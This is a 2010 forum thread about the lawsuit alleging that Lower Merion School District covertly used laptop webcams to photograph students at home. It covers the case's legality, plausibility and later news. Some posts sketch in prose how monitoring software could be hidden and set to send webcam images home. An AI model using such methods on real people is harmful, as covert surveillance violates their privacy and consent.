article (http://www.boingboing.net/2010/02/17/school-used-student.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+boingboing/iBag+(Boing+Boing))
According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. The issue came to light when the Robbins's child was disciplined for "improper behavior in his home" and the Vice Principal used a photo taken by the webcam as evidence.
A genuine WTF?!? moment.

I haven't read the attached PDF with all the legalese in it, but assuming the kid wasn't using the school laptop to surf porn or something (in which case, why need a picture?) I have to wonder what the hell the school was thinking. It would have saved time to just give the students millions of dollars rather than going through the hassle of a class action lawsuit.

Yeah. WTF. Hard to believe! Weren't they worried about being brought up on privacy charges?!?

Bloody hell. Really?

article (http://www.boingboing.net/2010/02/17/school-used-student.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+boingboing/iBag+(Boing+Boing))

A genuine WTF?!? moment.

I haven't read the attached PDF with all the legalese in it, but assuming the kid wasn't using the school laptop to surf porn or something (in which case, why need a picture?) I have to wonder what the hell the school was thinking. It would have saved time to just give the students millions of dollars rather than going through the hassle of a class action lawsuit.


Aside from the (I would have thought) utter impossibility of having any way of punishing kids for what they do at home... how did the school think for a second that secretly using technology to spy on people without their knowledge while in their own homes was not simply illegal?

Surely the school (or whichever idiot decided to do this and whichever other idiot decided to tell the kid off and thus reveal what they were up to) are now royally screwed?

This really is quite astonishing. Sometimes certain levels of stupidity almost take your breath away.

If it were one person at the school, say the admin for the laptops, who made this sort of royal **** up, well, ok. I can see that happening. It would be still be a display of stupidity of Great Pyramid of Giza monumental proportions. But to have the Vice Principle be handed this evidence means that she or he not only knew about it, but that their first reaction wasn't, "What the hell is wrong with you, undo this now and hope no one finds out."

Besides that, it means that they actually had a person or persons, personally reviewing the webcams. This isn't like the security cameras at Wal-Mart, where no one is watching them until after there has been a problem and they burn it to DVD for the cops. This is recording people, students, children, in their own homes and watching it which is horrendous enough on it's own, but couple that with, having no cause to suspect anything and it becomes the type of ******** that not even the, 'I have nothing to hide so I'm not worried' crowd can defend.

I haven't read the attached PDF with all the legalese in it, but assuming the kid wasn't using the school laptop to surf porn or something
okay, I've now read the PDF (as much as any mere mortal could) and didn't see any mention on why the school cracked down on the kid.

I would still like to know the school's side of the story, but even if they were fully justified in cracking down on the kid for improper use of school property, they stepped waaaaaaaay over the line by snapping a picture.

The only condition I can think to this that might redeem the school is if the kid were VPN'ed into the school network and (inappropriately) video chatting with someone in such a way that the stream went through the school. If that is the case, then the school is merely monitoring the traffic the kid sent to (and through) the school network.

I want to know what the "improper behavior in his home" actually was.

The more I think about this the more stupid it seems.

Someone watched this kid doing something at home via an illegal and secret camera and then decided to tell the kid off?

And they never considered that it might look a little bad on them?

I know I'm basically repeating myself now but... damn.

Personally, I don't believe the story is accurate. In order for this to work, the computer would have to have some custom software on it When the computer connected to the Internet, it would then have to connect to Central Computer (school office?) to say, "Here I am!" I'm not aware of any off-the-shelf software that does that.

If the school wanted to do something so clearly invasive and illegal, why wouldn't they tell people in advance? After all, the first time that they use the information, it's going to come into the open anyway. Even without using the info, there's no way such a system could stay hidden for very long. Are people not going to notice the camera working? The extra load on the CPU and network? Nobody is going to mention it ever?

The story we hear in the lawsuit probably only has a vague resemblance to the truth.

The story we hear in the lawsuit probably only has a vague resemblance to the truth.

You're probably right. I hope so,

It seems that the school used a photo on the laptop to demonstrate the kid was doing something improper. It could be that the kid took the photo himself and when the school got the laptop back they found the photo and took that further.
The remote connection may be a red herring. (Although all the stories seem to say quite clearly the laptops were capable of being remotely accessed in this way)

More likely the kid protested "I never took that photo of me doing that! It must be the school activating the laptop remotely."

Still, should be interesting.

Personally, I don't believe the story is accurate. In order for this to work, the computer would have to have some custom software on it When the computer connected to the Internet, it would then have to connect to Central Computer (school office?) to say, "Here I am!" I'm not aware of any off-the-shelf software that does that.


While I agree that the story might be inaccurate, off the shelf software does this all the time.

It's called Mac, or Windows, or hell even some Linux. It doesn't have to broadcast anything except when it is brought back to the school and acquires its 'home' network. Then it shares the files that it's told to always share with its home network and, low and behold, some of those files are web cam recordings.

I'm sure one of the more patient tech guys here will be glad to spell out exactly how this is possible and the holes in my hasty explanation of it. However, I don't think that part of the story debunks the tale. I'm actually more surprised that no tech savy students noticed it before.

If the school wanted to do something so clearly invasive and illegal... {snip}

Are people not going to notice the camera working?

Never underestimate people's ability to be stupid, in both of the above cases.
That second point leads me to believe that the webcam was already on and the school was somehow viewing the stream.


That being said, the legal filing claims that the school had the ability to turn the camera on remotely. There is probably more information than we're getting.

okay, I've now read the PDF (as much as any mere mortal could) and didn't see any mention on why the school cracked down on the kid.

I would still like to know the school's side of the story, but even if they were fully justified in cracking down on the kid for improper use of school property, they stepped waaaaaaaay over the line by snapping a picture.

I can kind of see an argument for it. This way you can't use the claim that it was someone else using the computer. Still if they are worried about this they can monitor how the computer is used and base it solely on that.

I could see this being standard if they had computer with webcams for student use. So if a computer is used for something inapropriate it will document who did it. If they then let the kid take it home with out changing the software. it moves from totaly legal to illegal.

This is absolutely insane.

Yeah. WTF. Hard to believe! Weren't they worried about being brought up on privacy charges?!?

I would think this falls under state law for wiretapping.

As others have stated, more information is needed.

I would think this falls under state law for wiretapping.


So do the lawyers.

They also think this falls under the 4th amendment.

I can't think of any legal theory under which this was a sensible idea.

Yes, it's possible. Usually when the school provides laptops like this, the laptops come pre-loaded with software and configured to allow remote access. However, there is also a user agreement informing the parents of this fact, and any monitoring is only during class. Turning on the web cam arbitrarily and peeping on the student would not be covered by such an agreement.

While I agree that the story might be inaccurate, off the shelf software does this all the time.

It's called Mac, or Windows, or hell even some Linux. It doesn't have to broadcast anything except when it is brought back to the school and acquires its 'home' network. Then it shares the files that it's told to always share with its home network and, low and behold, some of those files are web cam recordings.

I'm sure one of the more patient tech guys here will be glad to spell out exactly how this is possible and the holes in my hasty explanation of it. However, I don't think that part of the story debunks the tale. I'm actually more surprised that no tech savy students noticed it before.

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

The significance of this is that such a software request would not be cheap, and it would be become widely known in the school district. It's just one more piece of evidence that says this story is most likely ********:
* There's no good reason to do it.
* It's clearly against the law.
* Any practical or official use of the information would expose the whole shebang.
* It's expensive.
* Too many people would be involved for it to stay secret.
* It's easily detected by anybody with a modicum of computer expertise.
* Everybody involved would lose their jobs and be subject to civil lawsuits if not criminal prosecution.

On the other hand, we have the word of one student who claims that the school took a picture of him doing something inappropriate in his home. Right. They were just sitting there watching him stand right in front of his laptop. They saw him misbehave, so they saved a snapshot at Computer Central. Then they called the kid into the office and said, "We saw what you did on you own private time at home. Here's our evidence [shows pic]. You didn't actually break any school rules, and I am opening myself up a civil lawsuit of epic proportions, but so what? I just wanted to let you know."

Anybody want to wager on how this story turns out?

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers.

http://www.webcamxp.com/


eta: Wait, that might just be multiple video sources on the same computer. hold on.

eta2: yep, "remote administration (through web interface) (http://www.webcamxp.com/products.aspx)"

Yes, it's possible. Usually when the school provides laptops like this, the laptops come pre-loaded with software and configured to allow remote access. However, there is also a user agreement informing the parents of this fact, and any monitoring is only during class. Turning on the web cam arbitrarily and peeping on the student would not be covered by such an agreement.

Remote access when connected to the school network, yes. Once you connect to some other network (home), the school doesn't know where the laptop is unless it "phones home" so to speak. Then it's subject to the firewall restrictions. Sure, you could use something like www.LogMeIn.com, but that's hardly surreptitious.

http://www.webcamxp.com/

Surreptitious: obtained, done, made, etc., by stealth; secret or unauthorized; clandestine

I don't see that this software operates that way.

Surreptitious: obtained, done, made, etc., by stealth; secret or unauthorized; clandestine

I don't see that this software operates that way.

You install and configure it before giving the kid. Assuming Windows, you add it to the Start Up folder and hide the icon in the tray. It starts up when you start Windows and gives no overt indication that it is running.

Easy.


(Granted, anyone with any experience with computers could find and remove it pretty easy, but this is just an example. I don't know what they used.)

I would think this falls under state law for wiretapping.

If their version of the story is true (and to be fair, we don't know yet that it is), then the school risked more than just wiretapping charges by allowing remote activation of a webcam, they risked child pornography charges (if, for example, a student got undressed while the camera was on).

Remote access when connected to the school network, yes. Once you connect to some other network (home), the school doesn't know where the laptop is unless it "phones home" so to speak.

That's pretty easy to accomplish. Hell, I doubt you even need commercial software to do that, you can probably accomplish it with a Visual Basic script.

That's pretty easy to accomplish. Hell, I doubt you even need commercial software to do that, you can probably accomplish it with a Visual Basic script.

4 lines of bash scripting could do it. I can't imagine it's a long VB script, or that it couldn't be added as a windows service.

4 lines of bash scripting could do it. I can't imagine it's a long VB script, or that it couldn't be added as a windows service.
Especially if you have complete admin access to the computer before giving it to the kid. But that assumes a pretty tech savvy IT guy working at a high school. Not likely, in my experience, bu YMMV.

You install and configure it before giving the kid. Assuming Windows, you add it to the Start Up folder and hide the icon in the tray. It starts up when you start Windows and gives no overt indication that it is running.

Easy.


(Granted, anyone with any experience with computers could find and remove it pretty easy, but this is just an example. I don't know what they used.)

It's not surreptitious if anybody can easily find it and remove the software. The lawsuit talks about this stuff being covert. If it's a commercially available app that can be seen by anyone, the students would have sniffed it out the first week. It wouldn't sit around undetected for months until some administrator reveals the Big Secret by showing a kid a picture from his home. Interestingly, this picture was actually on the kid's laptop, not Computer Central.

There are other things in the lawsuit that I assume are the result of the lawyer not understanding technology. It says that the "webcam can be activated remotely at any time" by the school district. Well, short of radio transmitters in the laptop, this ain't gonna happen. The machine at least needs to be on and connected to the Internet. It says that the school district has the "ability to capture webcam images from any location where the laptop is kept." Again, untrue short of some CIA-type electronics.

If I wanted to be pedantic, I would point to all these things as further evidence that such software is not commercially available. But I'm not. I'm actually giving them the benefit of the doubt, but I'm only willing to bend so far.

My guess is that the laptops probably have remote administration software enabled, and this lawsuit is based on ignorance.

That's pretty easy to accomplish. Hell, I doubt you even need commercial software to do that, you can probably accomplish it with a Visual Basic script.

I never said it was hard. I said it was hardly surreptitious.

Your guess is the lawsuit is based on ignorance? Fascinating.

My guess is that the laptops probably have remote administration software enabled, and this lawsuit is based on ignorance.
Wait, how is that not just as bad, if they are using that access to take pictures of kids at home without their knowledge?

The lawsuit doesn't specify how the school did it, only what it did.

I never said it was hard. I said it was hardly surreptitious.

It's not surreptitious like a root kit is, but if you don't look for it, most people would never find it or even know about it. Windows has tons of processes running in the background, and most users have no clue what most of them do, and no interest in finding out. So if you don't tell them it's there, yeah, that's effectively surreptitious.

If they can turn the camera on then they can do the microphone, too. Keylogger? Maybe take your pulse through the touchpad? Beeg Brother.

I imagine the band-aid consumption in the community spiked overnight.

I would also note, UY, that many large school districts have IT staffs that are more then up to providing a script to do this, and embedding it pretty deep in some other innocuous app if they want to. I just can't imagine any IT department head OKing this, or not making a stink to the board and/or superintendent. The laws violated by this, let alone common sense and expectations from one's public school structure are just mind boggling. See paragraph 1, posting #5 above.

It's not surreptitious like a root kit is, but if you don't look for it, most people would never find it or even know about it. Windows has tons of processes running in the background, and most users have no clue what most of them do, and no interest in finding out. So if you don't tell them it's there, yeah, that's effectively surreptitious.

I already posted the definition. Clandestine is one of the descriptors, which requires concealment. I know people here in SI&CE love to get all pedantic, so I'm not going to continue to play your stupid little game of breaking apart quotes into small chunks, then re-adjusting the argument when the omitted parts are brought back into the picture.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

Sure. Out of thousands of high school students, not one went sniffing around to see what was running. Nobody actually saw the webcam coming to life and sending images back to Computer Central. Nobody noticed the CPU or bandwidth drag. Nobody noticed the disk chugging or the webcam light coming on. The software never crashed or caused any problems. There was never a firewall issue or anything like. It was just hidden right out in the open and nobody noticed it!

I know people here in SI&CE love to get all pedantic, so I'm not going to continue to play your stupid little game of breaking apart quotes into small chunks, then re-adjusting the argument when the omitted parts are brought back into the picture.

Easy there, fella.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists.

The lawsuit is almost certainly wrong on those counts. But that's not what people are interested in. What people are interested in is whether or not the school was able to remotely activate the webcam without the knowledge or consent of the student. You're right, the lawsuit claims more than that, but that alone would be enough to be a HUGE friggin' problem. And while I would hope that common sense would prevent a school from doing that, it's technically trivial to do. Can you understand why that could cause concern?

It is a DIFFERENT question as to whether or not that happened, and I don't think anyone here is claiming that we can simply assume that it did based on the complaint.

Especially if you have complete admin access to the computer before giving it to the kid. But that assumes a pretty tech savvy IT guy working at a high school. Not likely, in my experience, bu YMMV.

What's more likely is the computer admin/teacher having a kid set it up, or using a kid's project.

Adaptation of the "security" programs that snap a shot and phone home (for macs, there's iAlertU, for windows there are similar) is trivial.

The lawsuit is almost certainly wrong on those counts. But that's not what people are interested in. What people are interested in is whether or not the school was able to remotely activate the webcam without the knowledge or consent of the student. You're right, the lawsuit claims more than that, but that alone would be enough to be a HUGE friggin' problem. And while I would hope that common sense would prevent a school from doing that, it's technically trivial to do. Can you understand why that could cause concern?
I already pointed out that if they have any remote control software installed, they could take over the machine and do whatever they wanted to, and that includes running the webcam. Would it concern me if a school district, which simply loaned computers to students, had that kind of software installed? No, not really. There's always a measure of trust in these situations. Do they check the gym teachers for spa cams every day? No, but those teachers could certainly abuse their access.

It is a DIFFERENT question as to whether or not that happened, and I don't think anyone here is claiming that we can simply assume that it did based on the complaint.
You must be reading a different thread than I am because it seems some people are accepting the claim at face value.

So if the kid lived close to the school, and used the school's wireless connection...

I put a small piece of tape over that little feature on the digital device supplied to me by the organization that regularly deposits funds in my account in exchange for professional services.

/not paranoid

Well, short of radio transmitters in the laptop, this ain't gonna happen.
Er, isn't that sort of the whole point of the laptop - portability and wireless internet access?

Hmm, suppose a lap top supplied by someone else, were to be set up to use the net to only connect to the server of the suppliers choice?

Laptop -> net -> school -> net. User would think they are free to surf all they want, yet the school could run the users system. Lap top as a -what do they call them? minimal computing power, few apps installed, station? portal? Ya know, not a full computer, uses the net to communicate with the main PC? anybody?????

4 lines of bash scripting could do it. I can't imagine it's a long VB script, or that it couldn't be added as a windows service.

The concept would be the same on a Windows machine as it would be in a bash script. There would probably be a few more lines of code than in bash, though, because bash is sort of built for quicker and easier access for things like that (provided there's system drivers). I would imagine that on a Windows computer it wouldn't be much different than what Consumerist.com did to catch Geek Squad (http://www.consumerist.com/2007/07/video-consumerist-catches-geek-squad-stealing-porn-from-customers-computer.html), though instead of using a program to catch screenshots one would use WMI calls to access the camera.

In other words, not difficult at all using the script host and WMI access to the system.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

The only problem is that the school has already admitted that such software has been installed on the laptops they pass out, as a "security" measure. The idea is that it will help them track down stolen, lost, or missing computers.

From the AP Newswire:


The school district says it has deactivated a security feature intended to track lost or stolen laptops.

The district says the tracking feature would not be reactivated without "written notification to all students and families."

Also :


A suburban Philadelphia school district accused of spying on students at home via school-issued computers told parents it only activated the webcams to find missing laptops.

The schools' technology and security departments would activate the webcam when any of the 2,300 student laptops were reported lost or stolen, Lower Merion School District Superintendent Christopher McGinley said.

... which makes claims of technical impossibility rather difficult to defend.

And, of course, if the student was actually shown a picture taken from his web cam (as alleged in the lawsuit), then that makes McGinley's statement that they were only turned on to find missing laptops a lie, since Robbins' laptop had not been lost or stolen.

If the child performs the action -at school-, then the school might have a sayso.
What goes on off the school property, ain't none of their damn business!

If the child performs the action -at school-, then the school might have a sayso.
What goes on off the school property, ain't none of their damn business!
What if a student is convicted of a violent crime? Is that none of the school's business?

It's not surreptitious like a root kit is, but if you don't look for it, most people would never find it or even know about it. Windows has tons of processes running in the background, and most users have no clue what most of them do, and no interest in finding out. So if you don't tell them it's there, yeah, that's effectively surreptitious.

In any case, from a propriety standpoint, you don't have to look for government spying on you in private for you to stop them. They're simply forbidden from doing it in the first place.

What if a student is convicted of a violent crime? Is that none of the school's business?
.
"convicted of a violent crime".. then the school has an obligation to continue the student's education during the jail time.

.
"convicted of a violent crime".. then the school has an obligation to continue the student's education during the jail time.
What if there's no jail time, just probation?

Does the school not have a legitimate interest in knowing a violent offender is in their midst? Maybe even a sexual predator?

What if there's no jail time, just probation?

Does the school not have a legitimate interest in knowing a violent offender is in their midst? Maybe even a sexual predator?

There are laws concerning sexual offenders that often result in schools being notified. Notification of violent offenses is more spotty and really depends on the severity of crime. In high school we found out there was a murderer who attended our school. Most of the teachers did not know who the individual was and it became a game of speculation and rumor. As it was explained to me, telling everyone who it was would have been a violation of privacy laws even though if someone had the initiative to just take a list of all students and look up public records it could be found and not at all a violation of privacy laws. Hint hint. I never heard of anyone ever doing so, it was more fun to speculate and suspect which kids might be the murderer. Largely though, schools are limited and unable to punish the students for most illegal activity occurring outside the bounds of the school's jurisdiction so to speak. There might be special clubs that only allow thsoe who are law abiding, refrain from certain activities and such, but even so such clubs or honors do not give the school powers to circumvent privacy laws and spy on homes.

What if there's no jail time, just probation?

Does the school not have a legitimate interest in knowing a violent offender is in their midst? Maybe even a sexual predator?
.
These situations are obtainable by spying on the kid's family life?
Does not the court have some responsibility here?
There might be clues as to why the kid is a criminal in such surveillance, but the surveillance itself as discussed here is illegal.

If the child performs the action -at school-, then the school might have a sayso.
What goes on off the school property, ain't none of their damn business!

He was using school property.

.
These situations are obtainable by spying on the kid's family life?
Did I say that? I was just ointing out that there are circumstances where a school should know about some off-school occurrences.

There might be clues as to why the kid is a criminal in such surveillance, but the surveillance itself as discussed here is illegal.
I agree.

Nobody noticed the disk chugging or the webcam light coming on.

I cannot comment on the rest of your post, but this issue seems to be addressed in a Pennsylvania news article: http://www.philly.com/philly/news/nation_world/20100219_Remotely_accessing_a_laptop_is_fairly_eas y.html

There was even said to be an ideal cover story that got students to disregard a key warning.

Although a tiny green diode lights up when the MacBook's iSight camera, mounted just above the screen, is recording, school administrators allegedly warned about a bug - well-documented online by other MacBook users - that made the light come on randomly.

"Based on the number of times the green lights have randomly triggered," Lower Merion student Brian Sperling posted on the technology Web site Gizmodo yesterday, "I can't imagine that we're being watched (they'd need a task force) but some of the time [it] could have been them."

He was using school property.
.
Yeah...
Surreptitiously altered and used to observe activities not connected to the school.
it's not like he was taking a basketball home to shoot some hoops in the parking lot at home.

I've never understood why if god wanted everyone dead save Noah and his family, why didn't they just drop dead? Flooding seems awfully inefficient. It's my experience that if a news story sounds too outrageous to be true, it usually is.

.
"convicted of a violent crime".. then the school has an obligation to continue the student's education during the jail time.

No. The state has an obligation to do so. The school does not.

Zing!
Did you duck?

The only problem is that the school has already admitted that such software has been installed on the laptops they pass out, as a "security" measure.

Not exactly. Unca is right that the lawsuit describes software with capabilities that simply don't exist, and go far beyond what the actual software installed could have done. The problem is that the software doesn't need to have the capabilities described in the initial lawsuit in order to pose serious privacy problems, and software which can violate student privacy in unacceptable ways does exist and is trivial to set up. It sounds like this software may have been capable of that, but the devil is in the details, not just in terms of capability but also in terms of configuration.

If the child were sexting say, using the WiFi capabilities at home, and dumb enough to not remove the fact when taking the laptop to school, and the school then found the stuff, not in real time as is presumed, but after at the school when viewing what was on the computer, then the school isn't overtly spying, but there is a problem with their handling of the situation, it appears.

Here's the letter from the school district to the parents:
http://www.lmsd.org/sections/news/default.php?m=0&t=today&p=lmsd_anno&id=1138

Am I the only one who is annoyed that more details were not given? When they say it was activated to take a still picture of the operator and screen, I assume they mean "while connected to the Internet the laptop can be commanded to send those images back to Computer Central along with the IP address of the laptop. Together this information should often be sufficient for the police to locate and retrieve the laptop."

I would also like to think that there would be procedures in place for activating this feature. Access to it should have been severely restricted and each use should have been logged automatically for cross-referencing to the records for requests to activate the feature. It disturbs me that nothing like this was mentioned.

I'm also wondering at this point if the kid in question was actually in possession of a stolen laptop. From a practical standpoint, I can't see an administrator repeatedly triggering this feature, looking at the pictures, and then concluding the kid was misbehaving at home and then disciplining him at school for it. I mean, that's insane. Possible, yes, but frigging insane.

What behaviour, other than him causing damage to the laptop, could they possibly have grounds to discipline over?

Hmm, a glob of some kind of goop ought to blurr the camera without making it look like the user taped it over. Lip balm? Might not even be noticed by the teacher at school?

This morning's news is that the FBI is investigating.

Apparently, the kid was eating "Mike & Ike" candies, looked like pills on camera. The school is inferring that the laptop was reported stolen?

http://www.foxnews.com/story/0,2933,587034,00.html?test=latestnews

I didn't think it could get more stupid.

.
Yeah...
Surreptitiously altered and used to observe activities not connected to the school.
it's not like he was taking a basketball home to shoot some hoops in the parking lot at home.

Depends on what activities it was being used to cover. What restrictions does the school have on the use of their laptops?

This morning's news is that the FBI is investigating.

Apparently, the kid was eating "Mike & Ike" candies, looked like pills on camera. The school is inferring that the laptop was reported stolen?

http://www.foxnews.com/story/0,2933,587034,00.html?test=latestnews

Wow. It's like an onion - you pull off one layer of stupid, and there's another fresh layer of stupid right under it.

I didn't think it could get more stupid.
.
Have faith, Grasshopper.
There's no lower limit to stupidity.
It HAS to get more stupid, these things always do! :(

I hope the computers of those who had the ability to turn on the web cam are searched thoroughly.

Lots of child porn potential in this.

I hope the computers of those who had the ability to turn on the web cam are searched thoroughly.

Lots of child porn potential in this.

The FBI is investigating, which means that if even one kid was naked or whatever when they turned the camera on, the image will be found and there will be charges.

Wow. It's like an onion - you pull off one layer of stupid, and there's another fresh layer of stupid right under it.

I live in the area, and a cousin who has kids in the school district tells me that this may be a case of an exceedingly over-zealous vice-principal abusing a system designed to recover lost/stolen laptops. This is only second-hand word of mouth, mind you.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.

This is a school district with a terrific reputation, so the series of moronic decisions in this case lead me to believe that this individual, or a few individuals, manipulated the staff just long enough to spy on kids that they have been trying to "bring down" with no prior success.

Eventually someone else in authority with a modicum of sense would have realized what was going on and put the brakes on hard; but before reasonable people had a chance this vice-principal took the first tiny shred of "evidence" gathered and had his little moment of glory; a moment which will undoubtedly get him fired, blacklisted, and possibly jailed. The sad thing is a good school system, with good intentions, will suffer all the more.

...

This is a school district with a terrific reputation,...
is that Terrific as in "Causes terror", or the more usual version?
(JAQ)

I live in the area, and a cousin who has kids in the school district tells me that this may be a case of an exceedingly over-zealous vice-principal abusing a system designed to recover lost/stolen laptops. This is only second-hand word of mouth, mind you.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.

That sounds plausible to me. I've known elementary school teachers who over time behave more and more like children. It would not surprise me to find that this official fell into a similar trap.

Still, as you say, this is a third-hand anecdote.

only privately owned computers should have the ability to have their cameras remotely turned on. tax-payer funded institutions should not. they should let the police make such a call in cases of theft.

Hmmm, I wonder how many other schools use the same system? I doubt it was dreampt up by the one vice principal, it must be an optional anti-theft program sold to schools. And to ????

is that Terrific as in "Causes terror", or the more usual version?
(JAQ)

Terrific as in being the school system which produced Kobe Bryant ... :D

Lower Merion is a very wealthy school district, many of its students come from the "Main Line" (watch the movie "The Philadelphia Story" to get a sense of the Main Line). Many of it's students go on to attend Ivy League colleges. So I guess my point is that this is a school district with a lot of money; I'm quite sure that their IT and administrative staff is top-notch, the best money can buy. Ordinarily one would expect staff like this to cover all the bases and be on top of it's systems and programs. Which is why I tend to believe that someone intentionally manipulated the situation for their own reasons.

As to earlier assertions that it was unlikely that the software or monitoring system was sophisticated, think again. This school system has the money and resources of a small corporation.

It's still not fitting together for me. Apparently the school official cited as evidence a photograph "embedded" in the school-issued laptop. How does that mesh with the notion of Computer Central requesting the laptop send an image? The whole story just doesn't make sense to me yet.

I live in the area, and a cousin who has kids in the school district tells me that this may be a case of an exceedingly over-zealous vice-principal abusing a system designed to recover lost/stolen laptops. This is only second-hand word of mouth, mind you.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.

This is a school district with a terrific reputation, so the series of moronic decisions in this case lead me to believe that this individual, or a few individuals, manipulated the staff just long enough to spy on kids that they have been trying to "bring down" with no prior success.

Eventually someone else in authority with a modicum of sense would have realized what was going on and put the brakes on hard; but before reasonable people had a chance this vice-principal took the first tiny shred of "evidence" gathered and had his little moment of glory; a moment which will undoubtedly get him fired, blacklisted, and possibly jailed. The sad thing is a good school system, with good intentions, will suffer all the more.


I don't think it matters if everyone in the entire district save one are pure as driven snow and candidates for canonization. All this demonstrates is the truth of the old wisdom that if power can be abused then someone will abuse it.

If there was software installed on those computers which worked even approximately in the fashion that is being claimed then its mere presence is the transgression, not whether it is employed with discretion. There is going to be more than one assistant principal involved in making a policy decision of that sort.

Anyone involved in signing off on the installation of such software needs to be busted down to food service ... for farm animals.

After they get out of prison.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.
The kid's name isn't Ferris, is it?

I already posted the definition. Clandestine is one of the descriptors, which requires concealment. I know people here in SI&CE love to get all pedantic, so I'm not going to continue to play your stupid little game of breaking apart quotes into small chunks, then re-adjusting the argument when the omitted parts are brought back into the picture.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

Sure. Out of thousands of high school students, not one went sniffing around to see what was running. Nobody actually saw the webcam coming to life and sending images back to Computer Central. Nobody noticed the CPU or bandwidth drag. Nobody noticed the disk chugging or the webcam light coming on. The software never crashed or caused any problems. There was never a firewall issue or anything like. It was just hidden right out in the open and nobody noticed it!



According to this:

http://www.washingtonpost.com/wp-dyn/content/article/2010/02/20/AR2010022000679.html

The laptops are apples.

Per above article:

Lower Merion, an affluent district in Philadelphia's suburbs, issues Apple laptops to all 2,300 students at its two high schools.

Which means it's not even a matter of sophistication or monetary/skilled resources to have software that can snap a pic and phone home.

It's a matter of the school folks downloading and installing this (or something very similar):

http://lifehacker.com/207605/hack-attack-turn-your-macbooks-isight-into-a-ftp-backed-up-security-camera

It's an open source program coupled with a few small applescripts and it dials home to an ftp server and saves a copy of the picture locally. It is also easy to write this same function in an applescript and use automator (a task automation program) to set it up to listen to phone home and to do it without the noisy aspect of the above linked software. Literally it would take a average sysadmin about 15 minutes to create. To be clear: I used to have a mac that did this exact function. I used it to periodically update a webcam aggregator site my friend ran. I have done this. It is easy. (Also, I will point out that I am a professional UNIX Administrator and OS X is UNIX. I know exactly how easy this is.) Throw the automated scripts in a cron job owned by root and no one would know as a user unless they were very skilled and knew what they were looking for.

It also has little if any central management capabilities. That means anyone who knows a little about how the IT guy put it together could snap the pictures themselves.

Macs have little effective central management abilities (there are some policy based things that can be done, but they are not as friendly to central management.) What this looks like to me is an app installed to recover stolen laptops (which is of dubious effectiveness - a smart thief simply wipes the hard drive before booting to it and installs a pirated OS, and the article says they only recovered 18 stolen laptops this way) that has little to any regulation against staff abuse built in to the software.

I wouldn't be surprised if a school official was accessing these things without IT's knowledge, despite the claim only the techs could access it. Without the ability to have centralized role based access administration to the OS itself (and Apples struggle to come close to this) anyone with the knowledge of how to do it could access it. Per the article above:

Only two employees in the technology department, not administrators, were authorized to activate the cameras, which captured still images but not sound, officials said.

It doesn't say "able to" it says "authorized." Given how careful the language from the school is, this leads me to believe that access control was by honor system.

This is exactly why some companies (mine included) are reluctant to adopt macs in a professional setting as desktops/laptops. There are other considerations as well, but lack of centralized management without a large development project behind it is one.


So the idea that the type of software described in the article doesn't even exist is dead wrong. The idea it would be difficult or expensive to implement is dead wrong. The idea that anyone with the know how at the school could access it is very plausible.

It's still not fitting together for me. Apparently the school official cited as evidence a photograph "embedded" in the school-issued laptop. How does that mesh with the notion of Computer Central requesting the laptop send an image? The whole story just doesn't make sense to me yet.
Yes, we're guessing at the technical details, but so what?

Is there really any question that what is being described overall is possible? The important question here isn't how they did it precisely, but what they did and why. ...and really more the what.

Did the laptop take a picture of a student unknowingly in his home? Did the school direct the laptop to take that picture (either in real time or as some sort of cron job) without a legitimate reason to do so? Did that picture end up back in the school's possession without the student's knowledge or permission?

If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.

Yes, we're guessing at the technical details, but so what?

Is there really any question that what is being described overall is possible? The important question here isn't how they did it precisely, but what they did and why. ...and really more the what.

Did the laptop take a picture of a student unknowingly in his home? Did the school direct the laptop to take that picture (either in real time or as some sort of cron job) without a legitimate reason to do so? Did that picture end up back in the school's possession without the student's knowledge or permission?

If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.


If the answer is yes to the first question, game over in my opinion. That is a massive breach on the school's part if it indeed happened.

That it's technically possible is without question. Right now in my head I can think of 5 or 6 ways to have a script run in the background on a UNIX box, phone home, snap pictures, heck even rsync user files home, all without the user knowing if they didn't know what they were looking for.

I don't think it matters if everyone in the entire district save one are pure as driven snow and candidates for canonization. All this demonstrates is the truth of the old wisdom that if power can be abused then someone will abuse it.

If there was software installed on those computers which worked even approximately in the fashion that is being claimed then its mere presence is the transgression, not whether it is employed with discretion. There is going to be more than one assistant principal involved in making a policy decision of that sort.

